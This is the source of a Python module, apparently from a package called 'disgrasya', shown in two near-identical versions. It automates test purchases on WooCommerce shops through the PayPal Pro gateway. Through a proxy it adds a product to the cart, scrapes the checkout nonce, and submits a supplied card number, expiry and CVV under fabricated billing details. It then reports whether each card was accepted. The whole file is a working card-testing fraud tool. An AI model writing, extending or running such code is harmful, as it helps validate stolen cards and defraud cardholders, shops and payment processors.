==> disgrasya-1.19.0.tar.gz: disgrasya-1.19.0/disgrasya/paypalpro.py <==
from urllib.parse import urlparse
import requests
import json
import re

def stripTags(input_string):
    cleaned = re.sub(r'</?[^>]+(>|$)', '', input_string)
    cleaned = re.sub(r'\s+', ' ', cleaned).strip()
    return cleaned

def paypalpro_api(url, creditCard, proxy):
    G = "\033[38;5;82m"
    Y ="\033[38;5;226m"
    R2 = "\033[38;5;202m"
    R = "\033[0m"
    cc, mm, yy, cvv = creditCard.strip().split('|')
    brand = {'4': "Visa", '5': "MasterCard", '3': "Amex", '6': "Discover"}.get(cc[0], None)
    domain = urlparse(url).hostname
    session = requests.Session()

    #requests 1
    try:
        response = session.get(url, proxies=proxy)

        id_match = re.search(r'/wp-json/wp/v2/product/([^"]+)"', response.text)
        if not id_match:
            return print(f"[{R2}!{R}] {cc}|{mm}|{yy}|{cvv} Product ID not found in the response.")
        id = id_match.group(1)

    except Exception as e:
        return print(f"[{R2}!{R}] requests 1 An error occurred during processing: {e}")

    #requests 2
    try:
        data = {
            'quantity': 1,
            'add-to-cart': id
        }

        response = session.post(url, data=data, proxies=proxy)

        if response.status_code not in (200, 302):
            return print(f'[{R2}!{R}] {cc}|{mm}|{yy}|{cvv} Failed to add item to cart.')

    except Exception as e:
        return print(f"[{R2}!{R}] requests 2 An error occurred during processing: {e}")
    
    #requests 3
    try:
        url = f"https://{domain}/checkout/"
        response = session.get(url, proxies=proxy)

        nonce_match = re.search(r'name="woocommerce-process-checkout-nonce" value="([^"]+)"', response.text)
        if not nonce_match:
            return print(f"[{R2}!{R}] Checkout nonce not found in the response.")
        checkoutNonce = nonce_match.group(1)

    except Exception as e:
        return print(f"[{R2}!{R}] requests 3 An error occurred during processing: {e}")
    
    #requests 4
    try:
        url = f"https://{domain}/?wc-ajax=checkout"
        data = {
            'billing_first_name': 'Danyka',
            'billing_last_name': 'Kunde',
            'billing_country': 'US',
            'billing_address_1': '90154 Alanna Rapid Suite 080',
            'billing_city': 'New York',
            'billing_state': 'NY',
            'billing_postcode': '10080',
            'billing_phone': '15809662076',
            'billing_email': 'DanykaKunde@gmail.com',
            'payment_method': 'paypalpro',
            'billing_credircard': cc,
            'billing_cardtype': brand,
            'billing_expdatemonth': mm,
            'billing_expdateyear': yy,
            'billing_ccvnumber': cvv,
            'woocommerce-process-checkout-nonce': checkoutNonce,
            '_wp_http_referer': '/?wc-ajax=update_order_review'
        }

        response = session.post(url, data=data, proxies=proxy)
    
        if response.status_code == 200:
            status = stripTags(json.loads(response.text)["result"])
        
        if 'success' in status:
            receipt = stripTags(json.loads(response.text)["redirect"])
            return print(f"[{G}+{R}] {cc}|{mm}|{yy}|{cvv} {receipt}")
        elif 'failure' in status:
            message = stripTags(json.loads(response.text)["messages"])
            return print(f"[{Y}-{R}] {cc}|{mm}|{yy}|{cvv} {message}")
        else:
            return print(f"[{R2}!{R}] {cc}|{mm}|{yy}|{cvv} {response.text}")

    except Exception as e:
        return print(f"[{R2}!{R}] requests 4 An error occurred during processing: {e}")

==> disgrasya-1.20.0.tar.gz: disgrasya-1.20.0/disgrasya/paypalpro.py <==
from urllib.parse import urlparse
import requests
import json
import re

def stripTags(input_string):
    cleaned = re.sub(r'</?[^>]+(>|$)', '', input_string)
    cleaned = re.sub(r'\s+', ' ', cleaned).strip()
    return cleaned

def paypalpro_api(url, creditCard, proxy):
    G = "\033[38;5;82m"
    Y ="\033[38;5;226m"
    R2 = "\033[38;5;202m"
    R = "\033[0m"
    cc, mm, yy, cvv = creditCard.strip().split('|')
    brand = {'4': "Visa", '5': "MasterCard", '3': "Amex", '6': "Discover"}.get(cc[0], None)
    domain = urlparse(url).hostname
    session = requests.Session()

    #requests 1
    try:
        response = session.get(url, proxies=proxy)

        id_match = re.search(r'/wp-json/wp/v2/product/([^"]+)"', response.text)
        if not id_match:
            return print(f"[{Y}!{R}] {cc}|{mm}|{yy}|{cvv} Product ID not found in the response.")
        id = id_match.group(1)

    except Exception as e:
        return print(f"[{Y}!{R}] requests 1 An error occurred during processing: {e}")

    #requests 2
    try:
        data = {
            'quantity': 1,
            'add-to-cart': id
        }

        response = session.post(url, data=data, proxies=proxy)

        if response.status_code not in (200, 302):
            return print(f'[{Y}!{R}] {cc}|{mm}|{yy}|{cvv} Failed to add item to cart.')

    except Exception as e:
        return print(f"[{Y}!{R}] requests 2 An error occurred during processing: {e}")
    
    #requests 3
    try:
        url = f"https://{domain}/checkout/"
        response = session.get(url, proxies=proxy)

        nonce_match = re.search(r'name="woocommerce-process-checkout-nonce" value="([^"]+)"', response.text)
        if not nonce_match:
            return print(f"[{Y}!{R}] Checkout nonce not found in the response.")
        checkoutNonce = nonce_match.group(1)

    except Exception as e:
        return print(f"[{Y}!{R}] requests 3 An error occurred during processing: {e}")
    
    #requests 4
    try:
        url = f"https://{domain}/?wc-ajax=checkout"
        data = {
            'billing_first_name': 'Danyka',
            'billing_last_name': 'Kunde',
            'billing_country': 'US',
            'billing_address_1': '90154 Alanna Rapid Suite 080',
            'billing_city': 'New York',
            'billing_state': 'NY',
            'billing_postcode': '10080',
            'billing_phone': '15809662076',
            'billing_email': 'DanykaKunde@gmail.com',
            'payment_method': 'paypalpro',
            'billing_credircard': cc,
            'billing_cardtype': brand,
            'billing_expdatemonth': mm,
            'billing_expdateyear': yy,
            'billing_ccvnumber': cvv,
            'woocommerce-process-checkout-nonce': checkoutNonce,
            '_wp_http_referer': '/?wc-ajax=update_order_review'
        }

        response = session.post(url, data=data, proxies=proxy)
    
        if response.status_code == 200:
            status = stripTags(json.loads(response.text)["result"])
        
        if 'success' in status:
            receipt = stripTags(json.loads(response.text)["redirect"])
            return print(f"[{G}+{R}] {cc}|{mm}|{yy}|{cvv} {receipt}")
        elif 'failure' in status:
            message = stripTags(json.loads(response.text)["messages"])
            return print(f"[{R2}-{R}] {cc}|{mm}|{yy}|{cvv} {message}")
        else:
            return print(f"[{Y}!{R}] {cc}|{mm}|{yy}|{cvv} {response.text}")

    except Exception as e:
        return print(f"[{Y}!{R}] requests 4 An error occurred during processing: {e}")
